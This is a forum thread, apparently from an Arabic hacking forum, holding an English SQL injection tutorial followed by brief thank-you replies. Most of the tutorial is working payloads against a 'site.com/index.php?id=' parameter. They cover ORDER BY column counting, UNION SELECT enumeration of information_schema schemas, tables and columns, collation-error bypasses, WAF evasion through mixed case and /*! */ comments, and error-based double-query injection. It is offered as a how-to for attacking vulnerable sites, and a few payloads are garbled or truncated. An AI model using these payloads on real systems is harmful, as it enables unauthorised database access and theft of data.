|
sql injection by Almoftarse lets to read ok so here are some simple solutions of some simple problems (sql injection) if order by" is not working" so you have a vulnerable site Code: site.com/index.php?id=1 but the problem is that order by is not working you entered this command:- Code: site.com/index.php?id=1 order by 1-- << no eror Code: site.com/index.php?id=1 order by 5-- <<no eror Code: site.com/index.php?id=1 order by 100-- << no eror.. wtf !!! if you get this problem then use sqli string based and put this command:- Code: site.com/index.php?id=1' order by 1--+- <<no eror Code: site.com/index.php?id=1' order by 5--+- <<no eror Code: site.com/index.php?id=1' order by 100--+- <<eror (note): you can see i have also putted a single qoute (') at the place (id=1')<<so be carefull about this * some times if you get problems by using order by e.g Code: site.com/index.php?id=1 order by 100-- <<no eror or Code: site.com/index.php?id=1 order by 1-- <<eror then try to change the query like this Code: site.com/index.php?id=1 order by 1/* site.com/index.php?id=1 order by 5/* here are some more quries like: Code: -- - ,, --++- ,, -++--,, * ok while injecting a site if you see that there are no usefull table..! like (admin,auth,users,members,login) etc then remember every site have different number of schemas and there are different tables in every schema and you will get schema names by this command:- Code: site.com/index.php?id=1 union select 1,2,group_concat(schema_name),4 from information_schema.schemata and then tables from different schema using this:- Code: site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x<hex value of schema name> column names:- Code: site.com/index.php?id=1 union select 1,2,group_concat(column_name),4 from information_schema.tables where table_schema=0x<hex value of schema name> and table_name=0x<hex value of table name> hope it will help you * most sites has the problem when you try to get table names and it gives syntax eror e.g you used this command:- Code: site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables and it give syntax eror like you have eror near at line..blah blah on this condition you have to use different methods untill your success am writing down some of these commands:- Code: site.com/index.php?id=1 union select 1,2,group_concat(table_name),4 from information_schema.tables limit 0,1-- site.com/index.php?id=1 union select 1,2,concat(unhex(hex(table_name),4 from information_schema.tables limit 0,1 site.com/index.php?id=1 union select 1,2,table_name,4 from information_schema.tables limit 0,1-- hope it will help you * union select gives eror= illegal mix of collection Code: illegal mix of collection or something like this then you should use this method:- Code: site.com/index.php?id=1 union select 1,2,convert(version() using latin1),4-- current user:- Code: site.com/index.php?id=1 union select 1,2,convert(user() using latin1),4-- or Code: site.com/index.php?id=1 union select 1,2,unhex(hex(@@version)),4-- Code: site.com/index.php?id=1 union select 1,2,unhex(hex(user())),4-- mostly unhex(hex)) use to bypass illegal mix of collection eror.. if still not working then you should use this:- Code: site.com/index.php?id=1 UnIoN SeLeCt 1,2,unhex(hex(@@version))),4-- * waf (web application firewal) waf stands for (web application firewal) it blocks the commands and queries it will not block "order by" but it will block your command "union select" and while using "union select" you will get this eror:- Code: 404 forbidden you do not have permission to access blah blah and not acceptible you do not have to permission blah blah o now you can bypass this using these commands:- Code: site.com/index.php?id=1 UnIoN SeLeCt 1,2,CoNcAt(version()),4-- * site.com/index.php?id=1 UnIoN SeLeCt 1,2,CoNcAt(/*!table_name*/),4 from /*!information_schema*/.tables-- if not working then:- Code: site.com/index.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2,CoNcAt(/*!table_name*/),4 from /*!information_schema*/.tables * site.com/index.php?id=1 /*!UnIoN*/ /*!SeLeCt*/ 1,2,/*!CoNcAt*/(/*!table_name*/),4 from /*!information_schema*/.tables it will help you.. * if still getting eror again and again then you should use sql double query eror base and you can find here my tutorial about sql double query eror based it will be something like this:- Code: http://www.site.com/index.php?id=-1+...s+group+by+a)b) http://www.site.com/index.php?id=-1+...s+group+by+a)b) if still not acceptible or forbidden eror then use this:- Code: site.com/index.php?id=1 oR 1 group by concat_ws(0x3a,version(),user(),database(),floor(r and(0)*2)) having min(0) or 1-- hope it will help you.. |
رد: sql injection by Almoftarse lets to read Any thing i am here |
رد: sql injection by Almoftarse lets to read يعطيك الف عافيه اخي موفق باذن الله |
رد: sql injection by Almoftarse lets to read اقتباس:
thanksssssssss my teacher |
رد: sql injection by Almoftarse lets to read that's a cool stuf but it wpuld be better if u wrotte it in arabic so every 1 can get the idea any ways thnx bud |
رد: sql injection by Almoftarse lets to read يعطيك الف عافيه اخي موفق باذن الله |
رد: sql injection by Almoftarse lets to read thanks brother for this information |
رد: sql injection by Almoftarse lets to read حلو كتير بس برضو ما زبطتت |
رد: sql injection by Almoftarse lets to read موفق يا رب الف شكر يالحبيب |
| الساعة الآن 12:51 AM |
[ vBspiders.Com Network ]